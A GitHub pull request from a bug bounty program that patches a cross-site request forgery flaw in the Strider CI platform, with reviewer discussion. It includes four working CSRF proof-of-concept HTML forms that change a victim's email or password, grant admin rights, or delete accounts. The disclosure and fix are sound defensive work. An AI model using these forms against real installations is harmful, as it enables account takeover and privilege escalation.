Security fix for CSRF in strider
418sec/strider pull request #1
Opened 2020-12-18 12:20 UTC by arjunshibu

### 📊 Metadata *

#### Bounty URL: https://www.huntr.dev/bounties/1-other-strider/

### ⚙️ Description *

`Strider` is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to `Cross-Site Request Forgery (CSRF)`. It allowes an attacker to takeover accounts, privillege escalation and accounts deletion.

### 💻 Technical Description *

CSRF Protection is implemented using `csurf middleware`.
 
### 🐛 Proof of Concept (PoC) *

1. Setup MongoDB
2. Install the package
```bash
git clone https://github.com/Strider-CD/strider.git
cd strider/apps/strider
npm i
node bin/strider addUser # add users accordingly
NODE_ENV=production npm start # start server
```
3. Login as admin
4. Use any of the CSRF POCs
#### Change email
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/api/account/email" method="POST">
      <input type="hidden" name="email" value="admin2&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
#### Change password
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/api/account/password" method="POST">
      <input type="hidden" name="password" value="hacked" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
#### Privilege escalation
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/admin/make_admin">
      <input type="hidden" name="user" value="user&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
#### Account deletion
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/admin/remove_user" method="POST">
      <input type="hidden" name="email" value="admin&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

### 🔥 Proof of Fix (PoF) *

1. Build `app`
```bash
cd strider/apps/strider
npm i
npm run build
```
2. Build `client`
```bash
cd strider/clients/classic-ui
npm i
npm run build
```
3. Start server

#### Before fix:
![image](https://user-images.githubusercontent.com/43996156/102613134-f7c86e00-4157-11eb-85f5-d6cbd2698639.png)

#### After fix:
![image](https://user-images.githubusercontent.com/43996156/102613032-c9e32980-4157-11eb-9e7d-e3e3b3f2bfd0.png)
![image](https://user-images.githubusercontent.com/43996156/102613199-162e6980-4158-11eb-8b63-6ef6956a0035.png)

### 👍 User Acceptance Testing (UAT)

* I've executed unit tests.
* After fix the functionality is unaffected.

2020-12-18 13:00 UTC, mzfr reviewed
@arjunshibu  The fix looks legit. Just one small thing instead of showing the complete error messages with the file paths it would be nice to show a simple error message which wouldn't disclose any internal file paths.

2020-12-18 13:03 UTC, arjunshibu commented
@mzfr will update soon👍

2020-12-19 04:25 UTC, arjunshibu commented
@mzfr updated

![image](https://user-images.githubusercontent.com/43996156/102680634-06f2fe80-41e0-11eb-90b7-37d506e32fa5.png)
![image](https://user-images.githubusercontent.com/43996156/102680662-4883a980-41e0-11eb-8717-9929f190994b.png)

2020-12-28 17:23 UTC, Mik317 requested changes
Strange but `Reset password` and `User deletion` POCs are working :cry:
It's needed a better check on the `csrf token` from middleware in my opinion :smile:

Cheers,
Mik

2020-12-28 17:23 UTC, Mik317 commented on apps/strider/lib/app.js
> +  app.post(
Changed `get` to `post` :cry:

2020-12-29 05:05 UTC, arjunshibu commented on apps/strider/lib/app.js
> +  app.post(
> Strange but `Reset password` and `User deletion` POCs are still working :cry:

I checked, the fix is working on these PoCs. Can you provide the PoC you used if I'm wrong?
#### user deletion
![image](https://user-images.githubusercontent.com/43996156/103259787-dde12380-49c0-11eb-86bc-7c8508f7f3b5.png)
#### reset password
![image](https://user-images.githubusercontent.com/43996156/103259811-01a46980-49c1-11eb-930d-3fa4c9593d50.png)

> Changed get to post :cry:

I tried to use `GET` but couldn't generate token that way. `POST` approach seems more secure though and no functionality is affected. Any thoughts?

2020-12-29 08:46 UTC, Mik317 commented on apps/strider/lib/app.js
> +  app.post(
> > Strange but `Reset password` and `User deletion` POCs are still working cry
> 
> I checked, the fix is working on these PoCs. Can you provide the PoC you used if I'm wrong?
> 
> #### user deletion
> ![image](https://user-images.githubusercontent.com/43996156/103259787-dde12380-49c0-11eb-86bc-7c8508f7f3b5.png)
> 
> #### reset password
> ![image](https://user-images.githubusercontent.com/43996156/103259811-01a46980-49c1-11eb-930d-3fa4c9593d50.png)
> 
> > Changed get to post cry
> 
> I tried to use `GET` but couldn't generate token that way. `POST` approach seems more secure though and no functionality is affected. Any thoughts?

Sorry for the inconvenience, I'll retry ASAP with a fresh installation
Not sure if my computer is messing the files, but this time I'll completely remove the old installation to avoid problems :+1: 

Cheers,
Mik

2020-12-29 09:13 UTC, arjunshibu commented on apps/strider/lib/app.js
> +  app.post(
@Mik317 cool 😄

2021-01-14 06:35 UTC, merged

2021-01-14 06:35 UTC, huntr-helper commented
Congratulations arjunshibu - your fix has been selected! 🎉

Thanks for being part of the community & helping secure the world's open source code.
If you have any questions, please respond in the comments section, or hit us up on Discord. Your bounty is on its way - keep hunting!

[Come join us on Discord](https://huntr.dev/discord)